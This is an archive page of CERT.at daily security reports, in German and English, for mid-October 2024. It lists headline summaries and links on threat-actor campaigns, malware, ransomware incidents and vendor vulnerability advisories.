Bitdefender und Trend Micro gefährden Systeme. Admins sollten die verfügbaren Sicherheitsupdates zeitnah installieren, um Attacken vorzubeugen. [..] Im Supportbereich der Bitdefender-Website geben die Entwickler an, in diesem Kontext insgesamt fünf Sicherheitslücken (CVE-2023-49567, CVE-2023-49570, CVE-2023-6055, CVE-2023-6056, CVE-2023-6057) mit dem Bedrohungsgrad "hoch" geschlossen zu haben. Damit so eine Attacke klappt, können Angreifer etwa über Hashkollsionen (MD5 und SHA1) Zertifikate erzeugen, die als legitim durchgewunken werden. Die Sicherheitsprobleme sollen in der sich automatisch installierenden Total-Security-Version 27.0.25.11 gelöst sein. --------------------------------------------- https://heise.de/-9987394 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.10.2024
by Daily end-of-shift report 18 Oct '24

18 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 17-10-2024 18:00 − Freitag 18-10-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia ∗∗∗ --------------------------------------------- A close look at the utilities, techniques, and infrastructure used by the hacktivist group Crypt Ghouls has revealed links to groups such as Twelve, BlackJack, etc. --------------------------------------------- https://securelist.com/crypt-ghouls-hacktivists-tools-overlap-analysis/1142… ∗∗∗ Feline Hackers Among Us? (A Deep Dive and Simulation of the Meow Attack) ∗∗∗ --------------------------------------------- Introduction In the perpetually evolving field of cybersecurity, new threats materialize daily. Attackers are on the prowl for weaknesses in infrastructure and software like a cat eyeing its helpless prey. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/feline-hack… ∗∗∗ U.S. and Allies Warn of Iranian Cyberattacks on Critical Infrastructure in Year-Long Campaign ∗∗∗ --------------------------------------------- Cybersecurity and intelligence agencies from Australia, Canada, and the U.S. have warned about a year-long campaign undertaken by Iranian cyber actors to infiltrate critical infrastructure organizations via brute-force attacks."Since October 2023, Iranian ..d --------------------------------------------- https://thehackernews.com/2024/10/us-and-allies-warn-of-iranian.html ∗∗∗ Intel hits back at Chinas accusations it bakes in NSA backdoors ∗∗∗ --------------------------------------------- Chipzilla says it obeys the law wherever it is, which is nice Intel has responded to Chinese claims that its chips include security backdoors at the direction of Americas NSA. --------------------------------------------- https://www.theregister.com/2024/10/18/intel_china_security_allegations/ ∗∗∗ Alleged Bitcoin crook faces 5 years after SECs X account pwned ∗∗∗ --------------------------------------------- SIM swappers strike again, warping cryptocurrency prices An Alabama man faces five years in prison for allegedly attempting to manipulate the price of Bitcoin by pwning the US Securities and Exchange Commissions X account earlier this year. --------------------------------------------- https://www.theregister.com/2024/10/18/sec_bitcoin_arrest/ ∗∗∗ Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach ∗∗∗ --------------------------------------------- Brazilian authorities reportedly have arrested a 33-year-old man on suspicion of being "USDoD," a prolific cybercriminal who rose to infamy in 2022 after infiltrating the FBIs InfraGard program and leaking contact information for 80,000 members. More recently, USDoD was behind a breach at the consumer data broker National Public Data that led .. --------------------------------------------- https://krebsonsecurity.com/2024/10/brazil-arrests-usdod-hacker-in-fbi-infr… ∗∗∗ EIW — ESET Israel Wiper — used in active attacks targeting Israeli orgs ∗∗∗ --------------------------------------------- One of my Mastodon followers sent me an interesting toot today, which lead to this forum post .. --------------------------------------------- https://doublepulsar.com/eiw-eset-israel-wiper-used-in-active-attacks-targe… ∗∗∗ What I’ve learned in my first 7-ish years in cybersecurity ∗∗∗ --------------------------------------------- Plus, a zero-day vulnerability in Qualcomm chips, exposed health care devices, and the latest on the Salt Typhoon threat actor. --------------------------------------------- https://blog.talosintelligence.com/threat-source-newsletter-oct-17-2024/ ∗∗∗ Call stack spoofing explained using APT41 malware ∗∗∗ --------------------------------------------- Summary Call stack spoofing isn’t a new technique, but it has become more popular in the last few years. Call stacks are a telemetry source for EDR software that can be used to determine if a process made suspicious actions (requesting a handle to the lsass process, writing suspicious code to a newly allocated area, .. --------------------------------------------- https://cybergeeks.tech/call-stack-spoofing-explained-using-apt41-malware/ ∗∗∗ Fake North Korean IT Workers Infiltrate Western Firms, Demand Ransom ∗∗∗ --------------------------------------------- North Korean hackers are infiltrating Western companies using fraudulent IT workers to steal sensitive data and extort ransom. --------------------------------------------- https://hackread.com/fake-north-korean-it-workers-west-firms-demand-ransom/ ∗∗∗ U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now ∗∗∗ --------------------------------------------- Joint U.S. and UK advisory identifies 24 vulnerabilities exploited by Russian state-sponsored APT 29, with GreyNoise detecting active probing on nine of these critical CVEs. Stay informed with real-time .. --------------------------------------------- https://www.greynoise.io/blog/u-s-and-uk-warn-of-russian-cyber-threats-9-of… ∗∗∗ Apple Passwörter: So lautet das Rezept für generierte Passwörter ∗∗∗ --------------------------------------------- Ein leitender Softwareentwickler Apples erklärt in einem Blogpost, nach welchem Muster Apple Passwörter generiert. --------------------------------------------- https://heise.de/-9986503 ===================== = Vulnerabilities = ===================== ∗∗∗ SVD-2024-1013: Third-Party Package Updates in Splunk Add-on for Office 365 - October 2024 ∗∗∗ --------------------------------------------- Splunk remedied common vulnerabilities and exposures (CVEs) in Third Party Packages in Splunk Add-on for Office 365 versions 4.5.2 and higher. --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1013 ∗∗∗ Synology-SA-24:17 Synology Camera ∗∗∗ --------------------------------------------- The vulnerabilities allow remote attackers to execute arbitrary code, remote attackers to bypass security constraints and remote attackers to conduct denial-of-service attacks via a susceptible version of Synology Camera BC500 Firmware, Synology Camera TC500 Firmware and Synology Camera CC400W Firmware. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_17 ∗∗∗ ZDI-24-1419: Trend Micro Deep Security Improper Access Control Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1419/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.10.2024
by Daily end-of-shift report 17 Oct '24

17 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 16-10-2024 18:00 − Donnerstag 17-10-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Iranian hackers act as brokers selling critical infrastructure access ∗∗∗ --------------------------------------------- Iranian hackers are breaching critical infrastructure organizations to collect credentials and network data that can be sold on cybercriminal forums to enable cyberattacks from other threat actors. --------------------------------------------- https://www.bleepingcomputer.com/news/security/iranian-hackers-act-as-broke… ∗∗∗ Mit Standard-Zugangsdaten: Kubernetes-Lücke ermöglicht Root-Zugriff per SSH ∗∗∗ --------------------------------------------- Betroffen sind Images, die mit dem Kubernetes Image Builder erstellt wurden. Es gibt zwar einen Patch, doch der schützt bestehende Images nicht. --------------------------------------------- https://www.golem.de/news/mit-standard-zugangsdaten-kubernetes-luecke-ermoe… ∗∗∗ The 2024 State of ICS/OT Cybersecurity: Our Past and Our Future ∗∗∗ --------------------------------------------- The 2024 State of ICS/OT report shows our industry’s growth since 2019 and offers insight into how we may improve going into 2029. --------------------------------------------- https://www.sans.org/blog/the-2024-state-of-ics-ot-cybersecurity-our-past-a… ∗∗∗ DORA-Kernkonzepte verstehen: Fokus auf "Kritische oder wichtige Funktionen" ∗∗∗ --------------------------------------------- Mit dem Ziel, ein hohes Maß an digitaler operativer Widerstandsfähigkeit zu erreichen, bietet DORA einen umfassenden Rahmen für das wirksame .. --------------------------------------------- https://sec-consult.com/de/blog/detail/dora-core-concepts-critical-or-impor… ∗∗∗ Cisco confirms ongoing investigation after crims brag about selling tons of data ∗∗∗ --------------------------------------------- Networking giant says no evidence of impact on its systems but will tell customers if their info has been stolen UPDATED Cisco has confirmed it is investigating claims of stealing — and now selling — data belonging .. --------------------------------------------- https://www.theregister.com/2024/10/15/cisco_confirm_ongoing_investigation/ ∗∗∗ New ThreatLabz Report: Mobile remains a top threat vector with 111% spyware growth while IoT attacks rise 45% ∗∗∗ --------------------------------------------- The role of the CISO continues to expand, driven by the rising number of breaches and cyberattacks like ransomware, as well as SEC requirements for public organizations to disclose material breaches. Among the fastest-moving .. --------------------------------------------- https://www.zscaler.com/blogs/security-research/new-threatlabz-report-mobil… ∗∗∗ Sudanese Brothers Arrested in ‘AnonSudan’ Takedown ∗∗∗ --------------------------------------------- The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers. One of the .. --------------------------------------------- https://krebsonsecurity.com/2024/10/sudanese-brothers-arrested-in-anonsudan… ∗∗∗ Russische Hackergruppe bekennt sich zu Angriff auf das Internet Archive ∗∗∗ --------------------------------------------- Eine Gruppe namens "SN_BLACKMETA" hat nach eigenen Angaben DDoS-Attacken auf die Internetbibliothek durchgeführt --------------------------------------------- https://www.derstandard.at/story/3000000241091/russische-hackergruppe-beken… ∗∗∗ Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism ∗∗∗ --------------------------------------------- Explore how macOS Gatekeepers security could be compromised by third-party apps not enforcing quarantine attributes effectively. --------------------------------------------- https://unit42.paloaltonetworks.com/gatekeeper-bypass-macos/ ∗∗∗ Ransomware: Threat Level Remains High in Third Quarter ∗∗∗ --------------------------------------------- Recently established RansomHub group overtakes LockBit to become most prolific ransomware operation. --------------------------------------------- https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomwa… ∗∗∗ Cyber Resilience Act beschlossen ∗∗∗ --------------------------------------------- Der Cyber Resilience Act (CRA) ist eine EU-Verordnung für die Sicherheit in Hard- und Softwareprodukten mit digitalen Elementen, die am 10.10.2024 im Rat der Europäischen Union verabschiedet wurde. Nach der Veröffentlichung im Amtsblatt der EU wird das .. --------------------------------------------- https://certitude.consulting/blog/de/cyber-resilience-act-beschlossen/ ∗∗∗ Hacker allegedly behind attacks on FBI, Airbus, National Public Data arrested in Brazil ∗∗∗ --------------------------------------------- Police did not name the suspect, but a threat actor known as USDoD has long boasted of being behind the attacks that were highlighted by Brazilian law enforcement following the arrest. --------------------------------------------- https://therecord.media/hacker-behind-fbi-npd-airbus-attacks-arrested-brazil ∗∗∗ Why Hackers May Be Targeting You ∗∗∗ --------------------------------------------- In todays evolving cyber threat landscape, small and mid-sized businesses can reduce their risk by understanding cybercriminals, addressing misconceptions, and enhancing their cybersecurity and incident .. --------------------------------------------- https://www.emsisoft.com/en/blog/46073/why-hackers-may-be-targeting-you/ ===================== = Vulnerabilities = ===================== ∗∗∗ Oracle Releases Quarterly Critical Patch Update Advisory for October 2024 ∗∗∗ --------------------------------------------- Oracle released its quarterly Critical Patch Update Advisory for October 2024 to address vulnerabilities in multiple products. A cyber threat actor could exploit some of these vulnerabilities to take .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/10/17/oracle-releases-quarterl… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/994630/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.10.2024
by Daily end-of-shift report 16 Oct '24

16 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 15-10-2024 18:00 − Mittwoch 16-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ ASEC and NCSC Release Joint Report on Microsoft Zero-Day Browser Vulnerability (CVE-2024-38178) ∗∗∗ --------------------------------------------- AhnLab SEcurity intelligence Center (ASEC) and the National Cyber Security Center (NCSC) have discovered a new zero-day vulnerability in the Microsoft Internet Explorer (IE) browser and have conducted a detailed analysis on attacks that exploit this vulnerability. This post shares the joint analysis report “Operation Code on Toast by TA-RedAnt” which details the findings of the ASEC and NCSC joint analysis and the responses to the threat. --------------------------------------------- https://asec.ahnlab.com/en/83877/ ∗∗∗ Exfiltration over Telegram Bots: Skidding Infostealer Logs ∗∗∗ --------------------------------------------- Bitsight’s visibility over infostealer malware which exfiltrates over Telegram suggests that the most infected countries are the USA, Turkey, and Russia, followed by India and Germany. --------------------------------------------- https://www.bitsight.com/blog/exfiltration-over-telegram-bots-skidding-info… ∗∗∗ EDRSilencer red team tool used in attacks to bypass security ∗∗∗ --------------------------------------------- A tool for red-team operations called EDRSilencer has been observed in malicious incidents attempting to identify security tools and mute their alerts to management consoles. --------------------------------------------- https://www.bleepingcomputer.com/news/security/edrsilencer-red-team-tool-us… ∗∗∗ Mehrere Dienste betroffen: Microsoft warnt Kunden vor Datenverlust beim Logging ∗∗∗ --------------------------------------------- Durch einen Softwarefehler hat Microsoft einige für seine Kunden wichtige Protokolldaten verloren. Betroffen sind mehrere Clouddienste des Konzerns. --------------------------------------------- https://www.golem.de/news/mehrere-dienste-betroffen-microsoft-warnt-kunden-… ∗∗∗ New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists ∗∗∗ --------------------------------------------- The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said. --------------------------------------------- https://thehackernews.com/2024/10/new-linux-variant-of-fastcash-malware.html ∗∗∗ Windows 11 24H2: Probleme mit VPN-Verbindungen, Direct Access … ∗∗∗ --------------------------------------------- Seit Microsoft Windows 11 24H2 allgemein freigegeben hat, sind mir Meldungen zu Problemen rund um das Thema VPN-Verbindungen (CheckPoint VPN, WireGuard, Direct Access) untergekommen. Ich fasse mal einige dieser Meldungen in einem Beitrag zusammen, auch um ein Bild zu bekommen, ob es nur Einzelfälle sind oder ob mehr Leute betroffen sind. --------------------------------------------- https://www.borncity.com/blog/2024/10/15/windows-11-24h2-probleme-mit-vpn-v… ∗∗∗ Windows 11 24H2: Recall nicht deinstallierbar … ∗∗∗ --------------------------------------------- Trotz gegenteiliger Zusicherungen stellt sich momentan heraus, dass Microsofts umstrittene Funktion Recall sich nicht [ohne Kollateralschäden] unter Windows 11 24H2 deinstallieren lässt – das Ganze ist aktuell aber wohl noch im Fluss. --------------------------------------------- https://www.borncity.com/blog/2024/10/16/windows-11-24h2-recall-nicht-deins… ∗∗∗ Fake LockBit, Real Damage: Ransomware Samples Abuse AWS S3 to Steal Data ∗∗∗ --------------------------------------------- This article uncovers a Golang ransomware abusing AWS S3 for data theft, and masking as LockBit to further pressure victims. The discovery of hard-coded AWS credentials in these samples led to AWS account suspensions. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/j/fake-lockbit-real-damage-ran… ∗∗∗ Comparing AI Against Traditional Static Analysis Tools to Highlight Buffer Overflows ∗∗∗ --------------------------------------------- The idea of this blog post is to use open-source software tools to analyze unknown binaries for buffer overflows. In particular we are focusing on using Ollama3 to access multiple large language models. Ollama is a platform designed to simplify the deployment and usage of LLMs on local machines.This enables private data to be held locally instead of being sent to a cloud for processing. --------------------------------------------- https://www.nccgroup.com/us/research-blog/comparing-ai-against-traditional-… ===================== = Vulnerabilities = ===================== ∗∗∗ Oracle Critical Patch Update Advisory - October 2024 ∗∗∗ --------------------------------------------- A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. --------------------------------------------- https://www.oracle.com/security-alerts/cpuoct2024.html ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (buildah, containernetworking-plugins, and skopeo), Fedora (pdns-recursor and valkey), Mageia (unbound), Red Hat (fence-agents, firefox, java-11-openjdk, python-setuptools, python3-setuptools, resource-agents, and thunderbird), SUSE (etcd-for-k8s, libsonivox3, rubygem-puma, and unbound), and Ubuntu (apr, libarchive, linux, linux-aws, linux-aws-hwe, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, nano, and vim). --------------------------------------------- https://lwn.net/Articles/994436/ ∗∗∗ HP-DesignJet-Drucker: Angreifer können SMTP-Server-Logins abgreifen ∗∗∗ --------------------------------------------- Wie aus einer Warnmeldung hervorgeht, ist die Schwachstelle (CVE-2024-5749) mit dem Bedrohungsgrad "hoch" eingestuft. Klappen Attacken, sind SMTP-Server-Zugangsdaten einsehbar. Wie so ein Angriff ablaufen könnte, führen die HP-Entwickler derzeit nicht aus. Konkret davon betroffen sind die DesignJet-Modelle T730 und T830. --------------------------------------------- https://heise.de/-9983364 ∗∗∗ Mozilla: Security Vulnerabilities fixed in Firefox for iOS 131.2 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2024-54/ ∗∗∗ Synology-SA-24:14 Synology Photos ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_14 ∗∗∗ Synology-SA-24:13 BeePhotos ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_13 ∗∗∗ Bosch: Unrestricted resource consumption in BVMS ∗∗∗ --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-162032-bt.html ∗∗∗ F5: K000141463: Multiple Angular JS vulnerabilities CVE-2019-10768, CVE-2023-26116, CVE-2023-26117, and CVE-2023-26118 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000141463 ∗∗∗ F5: K000141459: Angular JS vulnerabilities CVE-2019-14863 and CVE-2022-25869 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000141459 ∗∗∗ F5: K000141302: Quarterly Security Notification (October 2024) ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000141302 ∗∗∗ F5: K000140061: BIG-IP monitors vulnerability CVE-2024-45844 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000140061 ∗∗∗ F5: K000141080: BIG-IQ vulnerability CVE-2024-47139 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000141080 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 15.10.2024
by Daily end-of-shift report 15 Oct '24

15 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Montag 14-10-2024 18:00 − Dienstag 15-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ TrickMo malware steals Android PINs using fake lock screen ∗∗∗ --------------------------------------------- Forty new variants of the TrickMo Android banking trojan have been identified in the wild, linked to 16 droppers and 22 distinct command and control (C2) infrastructures, with new features designed to steal Android PINs. --------------------------------------------- https://www.bleepingcomputer.com/news/security/trickmo-malware-steals-andro… ∗∗∗ New FIDO proposal lets you securely move passkeys across platforms ∗∗∗ --------------------------------------------- The Fast IDentity Online (FIDO) Alliance has published a working draft of a new specification that aims to enable the secure transfer of passkeys between different providers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-fido-proposal-lets-you-s… ∗∗∗ BEC-ware the phish (part 1). Investigating incidents in M365 ∗∗∗ --------------------------------------------- This blog post is the first of three, that look at the key steps for an effective investigation, response, and remediation to email-based threats in M365. Part two covers response actions as well as short- and long-term remediations to prevent attackers getting back in. Part three considers the native detection and prevention options in M365. --------------------------------------------- https://www.pentestpartners.com/security-blog/bec-ware-the-phish-part-1-inv… ∗∗∗ Vorsicht vor Anrufen vom „Bankbetrugssystem Österreich“ ∗∗∗ --------------------------------------------- Derzeit werden uns wieder vermehrt Tonbandanrufe gemeldet. Eine computergenerierte Stimme gibt sich als Bankbetrugssystem Österreich aus und behauptet, dass eine Zahlung von 1500 Euro abgelehnt wurde und Ihr Konto möglicherweise gehackt wurde. Sie werden aufgefordert, die Taste „1“ zu drücken, um mit einer echten Person verbunden zu werden. Legen Sie auf, das ist Betrug! --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-vor-anrufen-vom-bankbetrugs… ∗∗∗ New Telekopye Scam Toolkit Targeting Booking.com and Airbnb Users ∗∗∗ --------------------------------------------- ESET Research found the Telekopye scam network targeting Booking.com and Airbnb. Scammers use phishing pages via compromised accounts to steal personal and payment details from travelers. --------------------------------------------- https://hackread.com/telekopye-scam-toolkit-hit-booking-com-airbnb-users/ ∗∗∗ CISA Adds Three Known Exploited Vulnerabilities to Catalog ∗∗∗ --------------------------------------------- CVE-2024-30088 Microsoft Windows Kernel TOCTOU Race Condition Vulnerability, CVE-2024-9680 Mozilla Firefox Use-After-Free Vulnerability, CVE-2024-28987 SolarWinds Web Help Desk Hardcoded Credential Vulnerability --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/10/15/cisa-adds-three-known-ex… ∗∗∗ Fortinet FortiGate CVE-2024-23113 - A Super Complex Vulnerability In A Super Secure Appliance In 2024 ∗∗∗ --------------------------------------------- Today wed like to share a recent journey into (yet another) SSLVPN appliance vulnerability - a Format String vulnerability, unusually, in Fortinets FortiGate devices. It affected (before patching) all currently-maintained branches, and recently was highlighted by CISA as being exploited-in-the-wild. --------------------------------------------- https://labs.watchtowr.com/fortinet-fortigate-cve-2024-23113-a-super-comple… ===================== = Vulnerabilities = ===================== ∗∗∗ Splunk Security Advisories 2024-10-14 ∗∗∗ --------------------------------------------- Splunk released 12 security advisories: 4x high, 8x medium --------------------------------------------- https://advisory.splunk.com//advisories ∗∗∗ Kritische Schwachstellen in Industrieroutern mbNET ∗∗∗ --------------------------------------------- In industriellen Fernwartungsgateways und Industrieroutern mbNET wurden mehrere, teils schwerwiegende Sicherheitsschwachstellen identifiziert. Sie ermöglichen es, das Gerät vollständig zu kompromittieren sowie verschlüsselte Konfigurationen zu entschlüsseln. --------------------------------------------- https://www.syss.de/pentest-blog/kritische-schwachstellen-in-industrieroute… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (container-tools:rhel8, firefox, OpenIPMI, podman, and thunderbird), Debian (libapache-mod-jk, php7.4, and webkit2gtk), Fedora (edk2, koji, libgsf, rust-hyper-rustls, rust-reqwest, rust-rustls-native-certs, rust-rustls-native-certs0.7, rust-tonic, rust-tonic-build, rust-tonic-types, rust-tower, rust-tower-http, rust-tower-http0.5, and rust-tower0.4), Mageia (packages and thunderbird), Oracle (bind, container-tools:ol8, kernel, kernel-container, OpenIPMI, podman, and thunderbird), Red Hat (container-tools:rhel8, containernetworking-plugins, podman, and skopeo), SUSE (argocd-cli, bsdtar, keepalived, kernel, kyverno, libmozjs-115-0, libmozjs-128-0, libmozjs-78-0, OpenIPMI, opensc, php8, thunderbird, and xen), and Ubuntu (configobj, haproxy, imagemagick, nginx, and postgresql-10, postgresql-9.3). --------------------------------------------- https://lwn.net/Articles/994268/ ∗∗∗ WordPress plugin Jetpack fixes nearly decade-old critical security flaw ∗∗∗ --------------------------------------------- The popular WordPress plugin Jetpack has released a critical security update, addressing a vulnerability that could have affected 27 million websites. [..] The flaw, which is not believed to have been exploited, was found in the plugin’s contact form feature and had remained unpatched since 2016. This vulnerability could be exploited by any logged-in user on a site to read forms submitted by other users, according to Jetpack engineer Jeremy Herve. --------------------------------------------- https://therecord.media/wordpress-jetpack-plugin-fixes-flaw ∗∗∗ ZDI-24-1382: QEMU SCSI Use-After-Free Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1382/ ∗∗∗ Zahlreiche Schwachstellen im Rittal IoT Interface & CMC III Processing Unit ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/zahlreiche-schwachste… ∗∗∗ GitHub Enterprise Server (GHES) Security Update Advisory (CVE-2024-9487) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/83868/ ∗∗∗ Kubernetes: CVE-2024-9594 ∗∗∗ --------------------------------------------- https://github.com/kubernetes/kubernetes/issues/128007 ∗∗∗ Kubernetes: CVE-2024-9486 ∗∗∗ --------------------------------------------- https://github.com/kubernetes/kubernetes/issues/128006 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.10.2024
by Daily end-of-shift report 14 Oct '24

14 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 11-10-2024 18:00 − Montag 14-10-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Microsoft deprecates PPTP and L2TP VPN protocols in Windows Server ∗∗∗ --------------------------------------------- Microsoft has officially deprecated the Point-to-Point Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP) in future versions of Windows Server, recommending admins switch to different protocols that offer increased security. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-deprecates-pptp-a… ∗∗∗ Google warns uBlock Origin and other extensions may be disabled soon ∗∗∗ --------------------------------------------- Googles Chrome Web Store is now warning that the uBlock Origin ad blocker and other extensions may soon be blocked as part of the companys deprecation of the Manifest V2 extension specification. --------------------------------------------- https://www.bleepingcomputer.com/news/google/google-warns-ublock-origin-and… ∗∗∗ Microsoft’s guidance to help mitigate Kerberoasting ∗∗∗ --------------------------------------------- Kerberoasting, a well-known Active Directory (AD) attack vector, enables threat actors to steal credentials and navigate through devices and networks. Microsoft is sharing recommended actions administrators can take now to help prevent successful Kerberoasting cyberattacks. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidanc… ∗∗∗ Nation-State Attackers Exploiting Ivanti CSA Flaws for Network Infiltration ∗∗∗ --------------------------------------------- A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions. That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the credentials of those users. --------------------------------------------- https://thehackernews.com/2024/10/nation-state-attackers-exploiting.html ∗∗∗ Chatbot Traps: How to Avoid Job Scams ∗∗∗ --------------------------------------------- While the strategies outlined here can help you detect AI-powered scams, it is important to recognise that AI technology is advancing rapidly. Many current weaknesses—such as difficulties with complex questions or live conversations—may diminish as AI continues to improve. --------------------------------------------- https://connect.geant.org/2024/10/14/chatbot-traps-how-to-avoid-job-scams ∗∗∗ Casio says ransomware attack exposed info of employees, customers and business partners ∗∗∗ --------------------------------------------- Japanese electronics manufacturer Casio confirmed on Friday that a cyber incident announced earlier this week was a ransomware attack that potentially exposed the information of employees, customers, business partners and affiliates. --------------------------------------------- https://therecord.media/casio-ransomware-attack-exposed-emplyee-customer-da… ∗∗∗ Achtung: Neue textbasierte QR-Code-Phishing-Varianten ∗∗∗ --------------------------------------------- Sicherheitsforscher von Barracuda sind auf eine neue Variante zur Gestaltung von Phishing-Nachrichten gestoßen. Diese verwenden QR-Codes aus textbasierten ASCII/Unicode-Zeichen, statt wie üblich aus statischen Bildern erstellt zu werden, um herkömmliche Sicherheitsmaßnahmen zu umgehen. --------------------------------------------- https://www.borncity.com/blog/2024/10/13/achtung-neue-textbasierte-qr-code-… ∗∗∗ Sicherheitslücke in Ecovacs-Saugrobotern erlaubt Remote-Steuerung durch Hacker ∗∗∗ --------------------------------------------- In den USA häufen sich Fälle, in denen gehackte Saugroboter offenbar fremdgesteuert Beleidigungen zurufen und Bilder über die interne Kamera übertragen. --------------------------------------------- https://heise.de/-9979104 ===================== = Vulnerabilities = ===================== ∗∗∗ Notfall-Update: Tor-Nutzer über kritische Firefox-Lücke attackiert ∗∗∗ --------------------------------------------- Eine kritische Firefox-Schwachstelle betrifft auch den Tor-Browser und Thunderbird. Patches stehen bereit, kommen für einige Tor-Nutzer aber zu spät. --------------------------------------------- https://www.golem.de/news/notfall-update-tor-nutzer-ueber-kritische-firefox… ∗∗∗ Moxa: Missing Authentication and OS Command Injection Vulnerabilities in Cellular Routers, Secure Routers, and Network Security Appliances ∗∗∗ --------------------------------------------- The first vulnerability, CVE-2024-9137, allows attackers to manipulate device configurations without authentication. The second vulnerability, CVE-2024-9139, permits OS command injection through improperly restricted commands, potentially enabling attackers to execute arbitrary codes. --------------------------------------------- https://www.moxa.com/en/support/product-support/security-advisory/mpsa-2411… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (docker.io, libreoffice, node-dompurify, python-reportlab, and thunderbird), Fedora (buildah, chromium, kernel, kernel-headers, libgsf, mosquitto, p7zip, podman, python-cramjam, python-virtualenv, redis, rust-async-compression, rust-brotli, rust-brotli-decompressor, rust-libcramjam, rust-libcramjam0.2, rust-nu-command, rust-nu-protocol, rust-redlib, rust-tower-http, thunderbird, and webkit2gtk4.0), Oracle (.NET 6.0, .NET 8.0, e2fsprogs, firefox, golang, openssl, python3-setuptools, systemd, and thunderbird), SUSE (chromium, firefox, java-jwt, libmozjs-128-0, libwireshark18, ntpd-rs, OpenIPMI, thunderbird, and wireshark), and Ubuntu (firefox, python2.7, python3.5, thunderbird, and ubuntu-advantage-desktop-daemon). --------------------------------------------- https://lwn.net/Articles/994080/ ∗∗∗ Sicherheitsupdate: Angreifer können Netzwerkanalysetool Wireshark crashen lassen ∗∗∗ --------------------------------------------- Wireshark ist in einer gegen mögliche Angriffe abgesicherten Version erschienen. Darin haben die Entwickler auch mehrere Bugs gefixt. --------------------------------------------- https://heise.de/-9979991 ∗∗∗ ZDI-24-1374: IrfanView SID File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1374/ ∗∗∗ ZDI-24-1369: Zimbra GraphQL Cross-Site Request Forgery Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- 